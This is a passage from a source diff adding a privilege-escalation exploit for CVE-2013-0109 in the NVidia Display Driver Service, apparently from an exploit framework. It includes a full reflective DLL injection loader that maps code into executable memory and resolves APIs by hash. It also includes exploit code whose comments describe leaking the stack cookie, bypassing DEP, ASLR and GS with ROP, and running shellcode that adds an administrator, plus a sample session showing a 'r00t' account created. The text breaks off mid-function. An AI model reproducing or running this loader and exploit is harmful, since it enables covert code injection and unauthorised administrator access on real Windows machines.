(ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; + // set bCounter to the length for the loop + usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; + // clear uiValueC which will store the hash of the module name + uiValueC = 0; + + // compute the hash of the module name... + do + { + uiValueC = ror( (DWORD)uiValueC ); + // normalize to uppercase if the madule name is in lowercase + if( *((BYTE *)uiValueB) >= 'a' ) + uiValueC += *((BYTE *)uiValueB) - 0x20; + else + uiValueC += *((BYTE *)uiValueB); + uiValueB++; + } while( --usCounter ); + + // compare the hash with that of kernel32.dll + if( (DWORD)uiValueC == KERNEL32DLL_HASH ) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; + + // get the VA of the export directory + uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); + + // get the VA for the array of name pointers + uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); + + // get the VA for the array of name ordinals + uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); + + usCounter = 3; + + // loop while we still have imports to find + while( usCounter > 0 ) + { + // compute the hash values for this function name + dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); + + // if we have found a function we want we get its virtual address + if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) + { + // get the VA for the array of addresses + uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); + + // store this functions VA + if( dwHashValue == LOADLIBRARYA_HASH ) + pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); + else if( dwHashValue == GETPROCADDRESS_HASH ) + pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); + else if( dwHashValue == VIRTUALALLOC_HASH ) + pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + else if( (DWORD)uiValueC == NTDLLDLL_HASH ) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; + + // get the VA of the export directory + uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); + + // get the VA for the array of name pointers + uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); + + // get the VA for the array of name ordinals + uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); + + usCounter = 1; + + // loop while we still have imports to find + while( usCounter > 0 ) + { + // compute the hash values for this function name + dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); + + // if we have found a function we want we get its virtual address + if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) + { + // get the VA for the array of addresses + uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); + + // store this functions VA + if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) + pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + + // we stop searching when we have found everything we need. + if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache ) + break; + + // get the next entry + uiValueA = DEREF( uiValueA ); + } + + // STEP 2: load our image into a new permanent location in memory... + + // get the VA of the NT Header for the PE to be loaded + uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // allocate all the memory for the DLL to be loaded into. we can load at any address because we will + // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. + uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + + // we must now copy over the headers + uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; + uiValueB = uiLibraryAddress; + uiValueC = uiBaseAddress; + + while( uiValueA-- ) + *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; + + // STEP 3: load in all of our sections... + + // uiValueA = the VA of the first section + uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); + + // itterate through all sections, loading them into memory. + uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; + while( uiValueE-- ) + { + // uiValueB is the VA for this section + uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); + + // uiValueC if the VA for this sections data + uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); + + // copy the section over + uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; + + while( uiValueD-- ) + *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; + + // get the VA of the next section + uiValueA += sizeof( IMAGE_SECTION_HEADER ); + } + + // STEP 4: process our images import table... + + // uiValueB = the address of the import directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; + + // we assume their is an import table to process + // uiValueC is the first entry in the import table + uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); + + // itterate through all imports + while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) + { + // use LoadLibraryA to load the imported module into memory + uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); + + // uiValueD = VA of the OriginalFirstThunk + uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); + + // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) + uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); + + // itterate through all imported functions, importing by ordinal if no name present + while( DEREF(uiValueA) ) + { + // sanity check uiValueD as some compilers only import by FirstThunk + if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) + { + // get the VA of the modules NT Header + uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; + + // get the VA of the export directory + uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); + + // get the VA for the array of addresses + uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); + + // use the import ordinal (- export ordinal base) as an index into the array of addresses + uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); + + // patch in the address for this imported function + DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); + } + else + { + // get the VA of this functions import by name struct + uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); + + // use GetProcAddress and patch in the address for this imported function + DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); + } + // get the next imported function + uiValueA += sizeof( ULONG_PTR ); + if( uiValueD ) + uiValueD += sizeof( ULONG_PTR ); + } + + // get the next import + uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); + } + + // STEP 5: process all of our images relocations... + + // calculate the base address delta and perform relocations (even if we load at desired image base) + uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; + + // uiValueB = the address of the relocation directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; + + // check if their are any relocations present + if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) + { + // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) + uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); + + // and we itterate through all entries... + while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) + { + // uiValueA = the VA for this relocation block + uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); + + // uiValueB = number of entries in this relocation block + uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); + + // uiValueD is now the first entry in the current relocation block + uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); + + // we itterate through all the entries in the current block... + while( uiValueB-- ) + { + // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. + // we dont use a switch statement to avoid the compiler building a jump table + // which would not be very position independent! + if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) + *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; + else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) + *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; +#ifdef WIN_ARM + // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. + else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) + { + register DWORD dwInstruction; + register DWORD dwAddress; + register WORD wImm; + // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) + dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); + // flip the words to get the instruction as expected + dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); + // sanity chack we are processing a MOV instruction... + if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) + { + // pull out the encoded 16bit value (the high portion of the address-to-relocate) + wImm = (WORD)( dwInstruction & 0x000000FF); + wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); + wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); + wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); + // apply the relocation to the target address + dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; + // now create a new instruction with the same opcode and register param. + dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); + // patch in the relocated address... + dwInstruction |= (DWORD)(dwAddress & 0x00FF); + dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; + dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; + dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; + // now flip the instructions words and patch back into the code... + *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); + } + } +#endif + else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); + else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); + + // get the next entry in the current relocation block + uiValueD += sizeof( IMAGE_RELOC ); + } + + // get the next entry in the relocation directory + uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; + } + } + + // STEP 6: call our images entry point + + // uiValueA = the VA of our newly loaded DLL/EXE's entry point + uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); + + // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. + pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); + + // call our respective entry point, fudging our hInstance value +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR + // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) + ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); +#else + // if we are injecting an DLL via a stub we call DllMain with no parameter + ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); +#endif + + // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. + return uiValueA; +} +//===============================================================================================// +#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN + +BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) +{ + BOOL bReturnValue = TRUE; + switch( dwReason ) + { + case DLL_QUERY_HMODULE: + if( lpReserved != NULL ) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} + +#endif +//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h new file mode 100644 index 0000000000..3797879e47 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h @@ -0,0 +1,203 @@ +//===============================================================================================// +// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include +#include +#include + +#include "ReflectiveDLLInjection.h" + +typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); +typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); +typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); +typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); + +#define KERNEL32DLL_HASH 0x6A4ABC5B +#define NTDLLDLL_HASH 0x3CFA685D + +#define LOADLIBRARYA_HASH 0xEC0E4E8E +#define GETPROCADDRESS_HASH 0x7C0DFCAA +#define VIRTUALALLOC_HASH 0x91AFCA54 +#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 + +#define IMAGE_REL_BASED_ARM_MOV32A 5 +#define IMAGE_REL_BASED_ARM_MOV32T 7 + +#define ARM_MOV_MASK (DWORD)(0xFBF08000) +#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) +#define ARM_MOVW 0xF2400000 +#define ARM_MOVT 0xF2C00000 + +#define HASH_KEY 13 +//===============================================================================================// +#pragma intrinsic( _rotr ) + +__forceinline DWORD ror( DWORD d ) +{ + return _rotr( d, HASH_KEY ); +} + +__forceinline DWORD hash( char * c ) +{ + register DWORD h = 0; + do + { + h = ror( h ); + h += *c; + } while( *++c ); + + return h; +} +//===============================================================================================// +typedef struct _UNICODE_STR +{ + USHORT Length; + USHORT MaximumLength; + PWSTR pBuffer; +} UNICODE_STR, *PUNICODE_STR; + +// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY +//__declspec( align(8) ) +typedef struct _LDR_DATA_TABLE_ENTRY +{ + //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STR FullDllName; + UNICODE_STR BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + LIST_ENTRY HashTableEntry; + ULONG TimeDateStamp; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + +// WinDbg> dt -v ntdll!_PEB_LDR_DATA +typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes +{ + DWORD dwLength; + DWORD dwInitialized; + LPVOID lpSsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + LPVOID lpEntryInProgress; +} PEB_LDR_DATA, * PPEB_LDR_DATA; + +// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK +typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes +{ + struct _PEB_FREE_BLOCK * pNext; + DWORD dwSize; +} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; + +// struct _PEB is defined in Winternl.h but it is incomplete +// WinDbg> dt -v ntdll!_PEB +typedef struct __PEB // 65 elements, 0x210 bytes +{ + BYTE bInheritedAddressSpace; + BYTE bReadImageFileExecOptions; + BYTE bBeingDebugged; + BYTE bSpareBool; + LPVOID lpMutant; + LPVOID lpImageBaseAddress; + PPEB_LDR_DATA pLdr; + LPVOID lpProcessParameters; + LPVOID lpSubSystemData; + LPVOID lpProcessHeap; + PRTL_CRITICAL_SECTION pFastPebLock; + LPVOID lpFastPebLockRoutine; + LPVOID lpFastPebUnlockRoutine; + DWORD dwEnvironmentUpdateCount; + LPVOID lpKernelCallbackTable; + DWORD dwSystemReserved; + DWORD dwAtlThunkSListPtr32; + PPEB_FREE_BLOCK pFreeList; + DWORD dwTlsExpansionCounter; + LPVOID lpTlsBitmap; + DWORD dwTlsBitmapBits[2]; + LPVOID lpReadOnlySharedMemoryBase; + LPVOID lpReadOnlySharedMemoryHeap; + LPVOID lpReadOnlyStaticServerData; + LPVOID lpAnsiCodePageData; + LPVOID lpOemCodePageData; + LPVOID lpUnicodeCaseTableData; + DWORD dwNumberOfProcessors; + DWORD dwNtGlobalFlag; + LARGE_INTEGER liCriticalSectionTimeout; + DWORD dwHeapSegmentReserve; + DWORD dwHeapSegmentCommit; + DWORD dwHeapDeCommitTotalFreeThreshold; + DWORD dwHeapDeCommitFreeBlockThreshold; + DWORD dwNumberOfHeaps; + DWORD dwMaximumNumberOfHeaps; + LPVOID lpProcessHeaps; + LPVOID lpGdiSharedHandleTable; + LPVOID lpProcessStarterHelper; + DWORD dwGdiDCAttributeList; + LPVOID lpLoaderLock; + DWORD dwOSMajorVersion; + DWORD dwOSMinorVersion; + WORD wOSBuildNumber; + WORD wOSCSDVersion; + DWORD dwOSPlatformId; + DWORD dwImageSubsystem; + DWORD dwImageSubsystemMajorVersion; + DWORD dwImageSubsystemMinorVersion; + DWORD dwImageProcessAffinityMask; + DWORD dwGdiHandleBuffer[34]; + LPVOID lpPostProcessInitRoutine; + LPVOID lpTlsExpansionBitmap; + DWORD dwTlsExpansionBitmapBits[32]; + DWORD dwSessionId; + ULARGE_INTEGER liAppCompatFlags; + ULARGE_INTEGER liAppCompatFlagsUser; + LPVOID lppShimData; + LPVOID lpAppCompatInfo; + UNICODE_STR usCSDVersion; + LPVOID lpActivationContextData; + LPVOID lpProcessAssemblyStorageMap; + LPVOID lpSystemDefaultActivationContextData; + LPVOID lpSystemAssemblyStorageMap; + DWORD dwMinimumStackCommit; +} _PEB, * _PPEB; + +typedef struct +{ + WORD offset:12; + WORD type:4; +} IMAGE_RELOC, *PIMAGE_RELOC; +//===============================================================================================// +#endif +//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp b/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp new file mode 100644 index 0000000000..d97f113401 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp @@ -0,0 +1,537 @@ +/* + +NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 +- Bypass DEP + ASLR + /GS + CoE +============================================================= +(@peterwintrsmith) + + ** Initial release 25/12/12 + ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks + @seanderegge! + +Hey all! + +Here is an interesting exploit for a stack buffer overflow in the NVidia +Display Driver Service. The service listens on a named pipe (\pipe\nsvr) +which has a NULL DACL configured, which should mean that any logged on user +or remote user in a domain context (Windows firewall/file sharing +permitting) should be able to exploit this vulnerability. + +The buffer overflow occurs as a result of a bad memmove operation, with the +stack layout effectively looking like this: + +[locals] +[received-data] +[response-buf] +[stack cookie] +[return address] +[arg space] +[etc] + +The memmove copies data from the received-data buffer into the response-buf +buffer, unchecked. It is possible to control the offset from which the copy +starts in the received-data buffer by embedding a variable length string - +which forms part of the protocol message being crafted - as well as the +number of bytes copied into the response buffer. + +The amount of data sent back over the named pipe is related to the number +of bytes copied rather than the maximum number of bytes that the buffer is +able to safely contain, so it is possible to leak stack data by copying +from the end of the received-data buffer, through the response-buf buffer +(which is zeroed first time round, and second time round contains whatever +was in it beforehand), right to the end of the stack frame (including stack +cookie and return address). + +As the entire block of data copied is sent back, the stack cookie and +nvvsvc.exe base can be determined using the aforementioned process. The +stack is then trashed, but the function servicing pipe messages won't +return until the final message has been received, so it doesn't matter too +much. + +It is then possible to exploit the bug by sending two further packets of +data: One containing the leaked stack cookie and a ROP chain dynamically +generated using offsets from the leaked nvvsvc.exe base (which simply fills +the response-buf buffer when this data is echoed back) and a second packet +which contains enough data to trigger an overwrite if data is copied from +the start of the received-data buffer into the response-buf (including the +data we primed the latter to contain - stack cookie and ROP chain). + +Allowing the function to then return leads to execution of our ROP chain, +and our strategically placed Metasploit net user /add shellcode! We get +continuation of execution for free because the process spins up a thread +to handle each new connection, and there are no deadlocks etc. + +I've included two ROP chains, one which works against the nvvsvc.exe +running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers +from the Dell site, and one which works against the latest version of the +drivers for the same card, from: +http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m +http://www.geforce.co.uk/drivers/results/54709 + +Hope you find this interesting - it's a fun bug to play with! + +- Sample Session - + + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 + ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** + [@peterwintrsmith] + - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - + + Action 1 of 9: - CONNECT + + Action 2 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 3 of 9: - SERVER => CLIENT + Read 16504 (0x4078) characters from pipe + + Action 4 of 9: Building exploit ... + => Stack cookie 0xe2e2893340d4: + => nvvsvc.exe base 0x13fb90000: + + Action 5 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 6 of 9: - SERVER => CLIENT + Read 16384 (0x4000) characters from pipe + + Action 7 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 8 of 9: - SERVER => CLIENT + Read 16896 (0x4200) characters from pipe + + Action 9 of 9: - DISCONNECT + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +r00t +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1> + +*/ + +#include +#include +#define SCSIZE 2048 +char code[SCSIZE] = "PAYLOAD:"; + +enum EProtocolAction +{ + ProtocolAction_Connect = 0, + ProtocolAction_Receive, + ProtocolAction_Send, + ProtocolAction_Disconnect, + ProtocolAction_ReadCookie, +}; + +typedef struct { + EProtocolAction Action; + PBYTE Buf; + DWORD Length; +} ProtocolMessage; + +const int GENERIC_BUF_LENGTH = 0x10000; + +#define WriteByte(val) {buf[offs] = val; offs += 1;} +#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} +#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} +#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} +#define BufRemaining() (sizeof(buf) - offs) + +DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) +{ + DWORD dwWritten = 0; + + if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) + return dwWritten; + + return 0; +} + +DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) +{ + DWORD dwRead = 0, dwAvailable = 0; + + if(bTimeout) + { + for(DWORD i=0; i < 30; i++) + { + if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) + goto Cleanup; + + if(dwAvailable) + break; + + Sleep(100); + } + + if(!dwAvailable) + goto Cleanup; + } + + if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) + goto Cleanup; + +Cleanup: + return dwRead; +} + +HANDLE EstablishPipeConnection(char *pszPipe) +{ + HANDLE hPipe = CreateFileA( + pszPipe, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + + if(hPipe == INVALID_HANDLE_VALUE) + { + return NULL; + } + + return hPipe; +} + +BYTE *BuildMalicious_LeakStack() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + + for(UINT i=0; i<0x2000; i++) + WriteWord(0x41); + + WriteWord(0); + + WriteDword(0); + WriteDword(0x4078); + + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + + return buf; +} + +BYTE *BuildMalicious_FillBuf() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4000); + + while(BufRemaining()) + WriteDword(0x43434343); + + return 